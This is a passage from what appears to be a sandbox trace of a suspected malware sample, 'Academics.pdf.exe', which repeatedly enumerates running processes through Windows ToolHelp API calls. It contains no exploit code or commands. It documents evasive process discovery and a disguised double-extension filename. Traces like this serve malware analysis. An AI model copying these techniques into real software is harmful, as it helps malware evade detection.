returned 1 [0318.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0318.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0318.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0318.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0318.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0318.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0318.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0318.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0318.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0318.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0318.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0318.562] CloseHandle (hObject=0x294) returned 1 [0318.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.563] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.563] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0318.565] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0318.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0318.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0318.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0318.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0318.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0318.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0318.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0318.585] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0318.585] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0318.586] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0318.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0318.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0318.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0318.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0318.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0318.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0318.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0318.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0318.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0318.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0318.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0318.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0318.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0318.597] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0318.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0318.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0318.601] CloseHandle (hObject=0x294) returned 1 [0318.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.601] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.601] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.601] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0318.603] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.604] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0318.605] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0318.606] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.606] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.608] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.609] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.610] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.610] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0318.611] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.612] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 